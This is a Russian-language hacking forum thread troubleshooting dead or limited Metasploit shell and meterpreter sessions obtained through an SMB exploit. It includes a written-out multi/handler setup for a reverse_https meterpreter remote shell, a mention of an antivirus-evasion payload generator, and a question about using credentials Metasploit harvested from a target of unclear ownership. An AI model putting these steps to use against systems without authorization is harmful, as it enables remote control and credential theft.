Просмотр полной версии : Не работает shell
Elektrolife
07.02.2018, 11:10
Всем привет!
Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей.
В чём может быть проблема ?
https://forum.antichat.xyz/attachments/4799160/1517987100204.png
https://forum.antichat.xyz/attachments/4799160/1517987188674.png
---- Добавлено позже ----
Каким то чудом пробился в сессию MP,но меню как то не очень похоже на привычное,сильно урезан функционал ( Почему ?
https://forum.antichat.xyz/attachments/4799160/1517988816162.png
Elektrolife сказал(а):
Всем привет!
Каким то чудом пробился в сессию MP,но меню как то не очень похоже на привычное,сильно урезан функционал ( Почему ?
windows/shell/bind_tcp не есть meterpreter
Elektrolife
07.02.2018, 12:30
Dr.Lafa сказал(а):
windows/shell/bind_tcp не есть meterpreter
Поднял и шелл и метерпретер сессию. Шелл вообще не запускается,а МП какой то неполноценный. Набор команд ограниченный,пост модули не работают
woolf1514
07.02.2018, 18:18
пробовал reverse_tcp вместо этого?
Elektrolife
07.02.2018, 18:28
woolf1514 сказал(а):
пробовал reverse_tcp вместо этого?
у меня нет статики,а через no-ip почему то сразу резолвит локальный адрес и не хочет обращаться через ddns
Ещё очень интересно,что это за урезанная версия МП и почему не работают команды
woolf1514
07.02.2018, 18:42
Elektrolife сказал(а):
урезанная версия МП
так это вообще не МП)
Elektrolife сказал(а):
no-ip почему то сразу резолвит локальный адрес и не хочет обращаться через ddns
У меня некоторые эксплоиты работаю с с no-ip. Но не все)
Elektrolife
08.02.2018, 14:20
woolf1514 сказал(а):
так это вообще не МП)
По запросу session показывает что meterpreter ) По факту я думаю,что эксплоит отрабатывает но как то неправильно. Потому что сканнер показывает,что цель не подвержена эксплойту SMB,но тем не менее сессии прилетают )
вообще это метерпретер...решили свою проблему?
дело не в полезной нагрузке..а в метасплойте самом...сам сталкивался с данным чудом.
у меня такое случалось когда настраивал ssl шифрования, и запускал листенер в фоном режиме , т.е exploit -J
Elektrolife
06.03.2018, 09:47
kot-gor сказал(а):
вообще это метерпретер...решили свою проблему?
Не,так и не заработало (
---- Добавлено позже ----
OneDollar сказал(а):
Хм, юзай phantom-evasion и не парься)
Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.
Тут проблема скорее в адекватном приёме сессии
а можете скинуть настройки листенера?
Elektrolife
06.03.2018, 15:06
kot-gor сказал(а):
а можете скинуть настройки листенера?
Сейчас попробую найти.. А то я ковырял ковырял,забросил и уехал в отпуск )
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
Elektrolife
06.03.2018, 15:19
kot-gor сказал(а):
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
Внешний белый IP, пробовал и реверс и бинд TCP
Elektrolife
06.03.2018, 15:56
kot-gor сказал(а):
через роутер или впс?
Через роутер
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
Elektrolife
07.03.2018, 14:15
kot-gor сказал(а):
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
блин,не могу найти теперь таргет,после него забабахал уже кучу других... По факту - я точно не указывал ReverseListenerBindAddress )
немножко оффтоп:
метасплоит накопал некоторое количество кредов,но я никак не пойму,как ими воспользоваться ) В браузере по указанным портам не выдаёт форму логина\пароля... Как он проверил их на валидность ?
https://forum.antichat.xyz/attachments/4802863/1520417714474.png
вы проделайте всё заново, и сбросьте мне скрины консоли.
Elektrolife
12.03.2018, 11:14
kot-gor сказал(а):
вы проделайте всё заново, и сбросьте мне скрины консоли.
Скорее всего выключили сервер ( nmap говорит что сервер down.. Если поднимется - обязательно продолжу изыскания )
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot